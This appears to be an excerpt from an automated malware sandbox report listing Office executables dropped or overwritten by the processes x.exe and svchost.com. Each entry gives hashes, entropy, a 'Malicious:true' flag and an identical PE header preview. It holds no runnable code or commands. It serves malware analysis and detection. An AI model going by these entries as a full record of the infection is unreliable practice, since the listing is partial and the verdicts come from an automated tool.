                                      SHA-512:A8A081DFEB1D4491392013A1C14F95A40AB8DEF526294DD47B5F289ECC5C232D7437E4E0AA0E21A817F049F5FCD9EC7859E8A32FECE58749F89A34F6FCF83882
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\Program Files (x86)\Microsoft Office\root\Office16\SkypeSrv\SKYPESERVER.EXE

                                      Download File
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):137776
                                      Entropy (8bit):6.525052332322423
                                      Encrypted:false
                                      SSDEEP:1536:yxqjQ+P04wsZLnDrC1LS+I1HtQdiHN4zbyezltnzGd1XuDxhkrTJwNZ5wmW1aHba:zr8WDrC2Mi+zWeXdswvqiHm
                                      MD5:27361BE6CB3788839CD6DF5A0A636A6E
                                      SHA1:A8D3D9E774B7D76F00D10AB28DE26BBCCBC676DB
                                      SHA-256:A92037FDB4FE25E454D66D24177DD12FE89FAA6F11D0CEEADC687EF824CC3DE1
                                      SHA-512:3E8E821A4419C45FFA5F15AE574673684B25BDF310D48ED143D2EE6DE19F32F75C7DA0B9AFAFD3C4B27136E0C8632C092E365101E31E559AF731802D38B180F9
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\Program Files (x86)\Microsoft Office\root\Office16\UcMapi.exe

                                      Download File
                                      Process:C:\Windows\svchost.com
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):1206680
                                      Entropy (8bit):4.882283973567494
                                      Encrypted:false
                                      SSDEEP:12288:Y61ZFViRpx5tuwZl4asd/arEISgX0IkEMhTy:Y61jViRTfVINdCr6gX0hEl
                                      MD5:F0692573BEC940B10989FB076CF592CF
                                      SHA1:767783B45CB33834116997839FD3FE8CC197A906
                                      SHA-256:5ACCAE35532575F704C11E35DE05F5EC6C3A30D56AF91C2D22510157FC131607
                                      SHA-512:8F0F2881459C49C2F4F2A2E74D463871C157610ACF4FDBBE48FBD14B1798FEE8820822B4A5ED32F7FE871429E91A94859EAA7FD2798062723E594CDBA1364644
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\Program Files (x86)\Microsoft Office\root\Office16\VPREVIEW.EXE

                                      Download File
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):400336
                                      Entropy (8bit):6.659452867927771
                                      Encrypted:false
                                      SSDEEP:12288:w1rOCPapfd5bhooUBuFiExw/LXa20Dj6EzfJ:8rfIbbhooUBu3wzXa/Dj64
                                      MD5:3F124E3F206A45B5250F2C1F482B2352
                                      SHA1:2F23D83DC65BDEE9E726FB20052F01AA53D693F0
                                      SHA-256:D9D8BDCD8F5BBC87F755DBD7D8D0C7EF52C98A0E3539C8D27C08D3C45888C2C0
                                      SHA-512:C186E181EEAB666FA4E97FA5B750394421832221B5DF740BA6985AE8EBC49EF67969FD6F429C8F6094CC94EC548CBB3E10A473EE8A2FD52FA00110B6DA44B214
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

                                      Download File
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):1662344
                                      Entropy (8bit):4.281575468495792
                                      Encrypted:false
                                      SSDEEP:3072:zr8WDrCPK2OKsuWoZEsVK2OKsuWoZEckAQckAIDpAPfKrss1yyKrss1yAZDvYbNs:PulztkAzkAZqrEdrEAZUCwFjNNYEzcL
                                      MD5:0861465FD197D10AC5A8C37CE7B6AA62
                                      SHA1:2D76D722FD6806A45ABB733FD1E54288DFD3A05C
                                      SHA-256:7812FB1CD726D81ACC193605C5C9EEDF84FCB4A3A912FD5B9012A1A0DD27D5A2
                                      SHA-512:C019C0EB50A41C009E5878FA4AD38EDA155F79573C9755F2E334BAB3D75B480BB2C20988A560C1CAEAD8198A1AD60A0A4FECC74EEC2EE016CC37D2300B72BBFD
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\Program Files (x86)\Microsoft Office\root\Office16\WORDICON.EXE

                                      Download File
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):3531712
                                      Entropy (8bit):3.7839855914258114
                                      Encrypted:false
                                      SSDEEP:6144:Pu/gSRJQYKV++VYwjatvsDVpDsehRAKzYM:yQYZTWbDj5
                                      MD5:ACFE1EB24D010D197779C47023305858
                                      SHA1:5EF31BA99319ED468EC9DCB8BF43C888B5A8B48F
                                      SHA-256:D937B616BB6403C2D0AA39C3BDEFC7A07023C18B2FE1F4AFBB9400AFF2CBEB1F
                                      SHA-512:048FEEE926AD593265180CE8E07858E28BDB2876A6A41250B9AEDA024429CA89D9A17C1C7FFA2ED73E0349B3F681A92F22730CEE69F411D3698FD5557A5CD027
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\Program Files (x86)\Microsoft Office\root\Office16\Wordconv.exe

                                      Download File
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):83880
                                      Entropy (8bit):6.544402115664437
                                      Encrypted:false
                                      SSDEEP:1536:yxqjQ+P04wsZLnDrCSKfEBr3fHT4nAzHGkYJ+ziw6+zb:zr8WDrCSPh3IAzHGEJn
                                      MD5:9A1EAF11C3B1BEE44C0D97E873DB00C9
                                      SHA1:BD3A58C465171616D344DA00D97D5D49D4097FDC
                                      SHA-256:A1C8367E088D3CC9FD2D7428A2A220AA76E64096155932A6622023DE677CF804
                                      SHA-512:6A4A27DFF5939A527C9BE720FDEB7F65558D1A948AF175CD3244E87D9EFCA085B6A51D93E09D5178F05B29DC1334644E9532066C5A47F5C65BC60D27509C14D2
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\Program Files (x86)\Microsoft Office\root\Office16\XLICONS.EXE

                                      Download File
                                      Process:C:\Windows\svchost.com
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):4319112
                                      Entropy (8bit):3.816408890865793
                                      Encrypted:false
                                      SSDEEP:6144:PuXUh82lTMY/C3uuQyMyquNlBXYJ7M444IB:okyIgG47B
                                      MD5:0DF102A9ED5DDD0C490485998934BED6
                                      SHA1:B973807A3692668055A35A29C53C7F38669C8856
                                      SHA-256:9B42DD935106C8B407E7C607D3CD0AF533DFA3076576AC7EA2D838901CC6B4E2
                                      SHA-512:497E2C814A5B8B412540018D9BB5B3A47E0545FC7C280DB710052C8F77FF593E58881348B237FA892F7E208B632921D0962266E60CC5797389DA0122525AD496
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\Program Files (x86)\Microsoft Office\root\Office16\lync99.exe

                                      Download File
                                      Process:C:\Windows\svchost.com
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):785448
                                      Entropy (8bit):3.938581251810774
                                      Encrypted:false
                                      SSDEEP:6144:PurWSXeSC+hBMdNRneNMToeGYeneqjpGtBlmF:2LevUEcLe9l2
                                      MD5:B3C5F9613FB03A2AA578C29371295F77
                                      SHA1:32F9D3D1BF7BA8F34742900B9DA4A0FCF0F975CF
                                      SHA-256:08320B97919246079B98A5BFD40A67B5DA1452B166F2B9859E21D339998162D1
                                      SHA-512:5037960BC459159BA3D534B7585D6CD172A5563E075FE98EF1932EBA2BD65BCA37B99D782B1EAB5C33ADBA30DC63E8627140D60BD9028112D01BB9EE5A02EF15
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\Program Files (x86)\Microsoft Office\root\Office16\misc.exe

                                      Download File
                                      Process:C:\Windows\svchost.com
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):1081280
                                      Entropy (8bit):3.77728660153312
                                      Encrypted:false
                                      SSDEEP:3072:zr8WDrCqyTUawK12P04ti0o5gmQNJDJnJG20FxPlJPJSS12Zzwww6G:Puqs4wqmQN59wtSS2zwmG
                                      MD5:1D272485264476CF04C454866CFB49BA
                                      SHA1:9D13F47B98D36D3A64AFF45A9A04B17925898F5C
                                      SHA-256:F66B02E79D6DE29DBA8C76616B3F47DF597B386AB58DB30FA7E805E36FA7982E
                                      SHA-512:797B422388439BC78DA413ECC6749945ED4EA94D354ECEB21C1BEC10C5FA9A955DD02EC79626EB8996CEB36A82FD9D0EBB2F43EA1DF7CE94E8B0CD2D75A1A69C
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\Program Files (x86)\Microsoft Office\root\Office16\msoadfsb.exe

                                      Download File
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):1722808
                                      Entropy (8bit):6.4866587360850705
                                      Encrypted:false
                                      SSDEEP:49152:Ruoh1EWXRkd+h9y6NsRZ9MtL4kD5G5LVuhqITJemL9SQM3:RuohO2km9PNsRZ9MtL4ktG5LV93
                                      MD5:17B2C86B269267F4B810DBC51E6D793A
                                      SHA1:C14E9803B1D7DFBE027BE258957E23D7240C1625
                                      SHA-256:1EFA16D52D508905C4DBBDE4F450AE4511572E20DFC2AC930623C307410CB735
                                      SHA-512:B57B92283117554D2F7EF7E85613501F8EB3619980260CE427EAF443729417409BF8C6FA6FB4E1599BFD6EF0B3AC51955CA5CDCB63E9A7B9D680C960FE6545EC
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\Program Files (x86)\Microsoft Office\root\Office16\msoasb.exe

                                      Download File
                                      Process:C:\Windows\svchost.com
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):307784
                                      Entropy (8bit):6.541340621340083
                                      Encrypted:false
                                      SSDEEP:6144:Pue+OpwoajoJ/cLr6eNI0A2kg79zge/ceeE1+v:3DWhS5g72veeU+v
                                      MD5:84FFBDBA0110417D41CECC2E90471C0B
                                      SHA1:3BD410023FAAB616BD19316FC7DA4CF8061843E0
                                      SHA-256:4C46A3280A95DA909745B05317CC39ABF3C631F79F127F191F1E5AE202A636C9
                                      SHA-512:FA4B33C8848F4A31D8ABF850997C2311B246EE0103A28A23A688F8FD8DBB2621AB7272DA1CE0C8447F6E8BF4ED97A007599CCBA36A431E5E0CD2BB4E5768FEF7
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\Program Files (x86)\Microsoft Office\root\Office16\msoev.exe

                                      Download File
                                      Process:C:\Windows\svchost.com
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):97920
                                      Entropy (8bit):6.434533395747017
                                      Encrypted:false
                                      SSDEEP:1536:yxqjQ+P04wsZLnDrC8zKAtCz72I/Q/RPTO5piDDFwzS:zr8WDrC8uFvgy5piDD6zS
                                      MD5:B35E1DBEB6DE3D98F0D02D5FE062688A
                                      SHA1:F4C8399B000865937C933ED4D3F7443A6395136A
                                      SHA-256:BD9D62FD719401FAE645118FBB811EEFA626A2E796FAAF41FF43AE971C46F9C2
                                      SHA-512:D61B9DE832AD9E160B108640E372DB887D32A4B6CA62652E04410BE0DA0859B79E76FA48B5DB95FFD4A8FFC786D7BC3AC1ECC1964CB3D03385BB2A2AFD923818
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\Program Files (x86)\Microsoft Office\root\Office16\officeappguardwin32.exe

                                      Download File
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):1994448
                                      Entropy (8bit):6.5494262482330186
                                      Encrypted:false
                                      SSDEEP:49152:7l8U9+tiqfG7C+5I6ZOX0Bh4MdDHc/EBRXXZUABfmcQ:7l8+++7hOXODHc/EdQ
                                      MD5:611A0196619175CA423FC87C3C2B0D17
                                      SHA1:426524B4E733928688F2CA5E61E110D9BA5E98EA
                                      SHA-256:EA42CCC4A3105C8D1081D6803C17D7F898F8AE86AFAE34BB3718B15CE1087D55
                                      SHA-512:6C130A7C935B867353F7E77D0C84BC3F3EE0176ED2327D60969838C409ADC51B2C3B00AC449EFED7327DCFB07007C3D02ED708D2D37837BCB754F25CC60CE7B4
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\MSOXMLED.EXE

                                      Download File
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):317344
                                      Entropy (8bit):4.535670723169867
                                      Encrypted:false
                                      SSDEEP:3072:zr8WDrCc6gxe7z3OzY+9jTYbE+lvr8WDrC:PuFggzBEjTYY+lTu
                                      MD5:141965A6FB0E90317FE0B64C191D2714
                                      SHA1:90DF3DFBEAF665C1A02F7FD98C31F3C54A349026
                                      SHA-256:C0DBF04B8708BA508A777F33997E43572CF1DB350D0B568C628DA3272AD6DF51
                                      SHA-512:835CEB459949226EABE86CEA18C0D50557EE8E611FF95873A0984757D016034698B1D8CFFA835F660227D95214682C96D01803FFCFF80677ACE00371447C161F
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe

                                      Download File
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):751520
                                      Entropy (8bit):6.5225913014857735
                                      Encrypted:false
                                      SSDEEP:12288:DccV8BFJ0kz4uP9V6wY2M48aVNfffNfYRweSat8UVNfffNfRtAUUn4lDW7f5sBzl:DOFJbl/6r2M48aVNfffNfWVNfffNfDw+
                                      MD5:5FB2510E2322EB38DBE1414EB158EF02
                                      SHA1:974C5E74E4D9CBEB1A1BFBA2348E13659578BC38
                                      SHA-256:7BEA8CDAEEEAB13F9E3C82D520AFD1C8F33A34B519D1FF6B62628DD5C3D9974C
                                      SHA-512:066195CBFFE4C2EE4D8E39D0C1D7F58A8E54388F22BFF619CCC0E1CD2BCF350A8D81D254C6045F6506EC33F3CB7ACE2C3CA7E77DD05DD05AD6B18F87BB457359
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\aimgr.exe

                                      Download File
                                      Process:C:\Windows\svchost.com
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):182712
                                      Entropy (8bit):6.321044292407141
                                      Encrypted:false
                                      SSDEEP:3072:zr8WDrC3DbGpEPwVH+lMCNy0GEVVS1ikLrDdevXqHai8MBEL4:Pu3XSSwVgvfkhvzHcWEM
                                      MD5:D6A43031983F75E73D90D8F8F6EE65F3
                                      SHA1:891DE44CFCE6AC6BC790C766971D94872E8A5073
                                      SHA-256:28BDD891C54357A87F38A2BF6705BC1B2B6989B5BD3BF4CA750829FBD7FA2B51
                                      SHA-512:0A96059DE916DC162D297D78AC26B8FAB136E475E2A622CF736E84FCEFAE57C2861D24121E6B87FA70F25401BC8870BB9F2434DFFF77B70E396AE3775DDB2416
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE

                                      Download File
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):5215832
                                      Entropy (8bit):7.2575341874723645
                                      Encrypted:false
                                      SSDEEP:49152:v/xFnOvtaWIDn0apLKkLJU9nU2foKhA4vSWidGHp+NDGQUzbpDOfjxAkrQKl+RPi:RtLK3BDhtvS0Hpe4zbpaAKQkroGI
                                      MD5:B9466BCCAA9D0EA372B6DC9695C50293
                                      SHA1:A4A5A9F9E2DDC3920BA5573170FED2A128C02856
                                      SHA-256:918A5C4FC2B4AAC31AEAC084A104B3F7A41B32BE006F8F2B6DFC2886036FDB2D
                                      SHA-512:4F465FD01A875C58FBF9C52ED15133E9EAC5917E35077ABF7C537977D3EE4B3F583B34BFF7B06CBBE68D884052620AA3CA0DE182CEBBC3A34B93AD3C7A393289
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\DW\DW20.EXE

                                      Download File
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):139712
                                      Entropy (8bit):6.519874180004667
                                      Encrypted:false
                                      SSDEEP:3072:zr8WDrCGU5adWAKmzUccnzkVBgEuKjj0WWtPPoI:Put+EjzCg+j6P3
                                      MD5:7939D58529E97846AD3CE93D63C2778B
                                      SHA1:36E2D3DAF36C2D0208971A66DAA273B627D43D9E
                                      SHA-256:131DB672352CDE0AB0154F4E5EE0FD28F93494F5D35FE9572BE2C6BE29467838
                                      SHA-512:05D79A0F03D4087C970B5E4EA7B08AFAA3C86EB8B8CB4E5F3658DB71CC2DAD969351A1B37FF5384513132846B7B9F022AA5863D02245FBDBE32E4609E3729C9E
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\FLTLDR.EXE

                                      Download File
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):380368
                                      Entropy (8bit):6.674833575620702
                                      Encrypted:false
                                      SSDEEP:6144:PulzgSb/029S2P/7nzGxFrRN0r0ivCZci1FXiO8DaS4wwE0CBlFJmcx:Xw/2q/roN7ivCZci1FC74wdBlFYU
                                      MD5:10DAF38B33648DB8EC4CAF569EFB8325
                                      SHA1:D226C4CB3EAC2BBB40C7070DF3360DA6087EF85D
                                      SHA-256:3ED456CAFC1F681A4823411C4F931DB89A14DD1F4C439814E3C69780F489FB33
                                      SHA-512:8D0975F6C992DEA085532A41B8542D44CBA540DF7BABF1F81E1EF5A5CFA2CCBA010264B2E96F92CFBFF0A8EEEF18BA90CEC3A0639999FBEBF98EFC4188BD24DC
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOICONS.EXE

                                      Download File
                                      Process:C:\Windows\svchost.com
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):1269696
                                      Entropy (8bit):3.7496395278811394
                                      Encrypted:false
                                      SSDEEP:6144:PuTvk8/0NhFYAddenZhUhTNnLUrh+9nTGLljX4wuSzVF:C4wXF
                                      MD5:622DF9CBD4454B7D31D93A8FF26986A7
                                      SHA1:D9B343BDE5D6038757BD9D3FC3A1DB5D44FCC406
                                      SHA-256:1BC8B5224D1EC7C1A84FE6BE3D1FC2584C4407F4776BE701311B5F59CC6B2F72
                                      SHA-512:CB62A86DF9A944F1BA87FEB86CCBB4C8FE34518F5701B513FC0C837E37E9E0F3D2BCB392FAC866C30D6AED8DFF4B65789134FDFA21B62A049FA701C2BBD86272
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXE

                                      Download File
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):266648
                                      Entropy (8bit):4.185481008908313
                                      Encrypted:false
                                      SSDEEP:1536:yxqjQ+P04wsZLnDrCyRaCAd1uhNRuiazvhzpwtWhz7I3EWwwrwYx6RPWdn6ysl4a:zr8WDrCgezzvhF1h3wEWwwbx6ksl4D
                                      MD5:63852098CCC25D5425C739E6CAD65F4E
                                      SHA1:DE0C1A4DCA860867D769B155909B5B26323FE00E
                                      SHA-256:1DF1BE777988330F8D3E437175CA8B9D1CF4AB2C6328EA700013A5A0D766715A
                                      SHA-512:E6893FD4B8D212754383C86CF493242C8A15408742FF6DBD01A8B6B056EE6F6C359E6E87ABD63628FB54D3719B4C0C9731CA7712C7C78D0CDE7E1231BF814081
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\OLicenseHeartbeat.exe

                                      Download File
                                      Process:C:\Windows\svchost.com
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):715760
                                      Entropy (8bit):6.522162821709477
                                      Encrypted:false
                                      SSDEEP:12288:U4tuuLntIMDXw5vde5EFf1Pmbd3lSz3dfp1Swf5M0blmFKuJOJZM30j3:7tFDKMg4iX3djfy0blmFlme303
                                      MD5:6F1E23677F89E09E3B4D7CBBFAA8E9D6
                                      SHA1:3BFA1C0F2AF97A85C282E141DD9E7D36D2466211
                                      SHA-256:CCACC1332115B620976CDB004CF6CFE426AD8CD008F8F0DED6D6F5CB71D8D8F1
                                      SHA-512:D7E6E401DECBF9989C51EE3F4BEE09F696BF25F13FD723AE7BFDDBFD7B7C2C21367D91289AFC4571B6EF34E541920A307F1F4A09F1680A97A2970E7D3412426A
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\ai.exe

                                      Download File
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):619944
                                      Entropy (8bit):6.637875601699727
                                      Encrypted:false
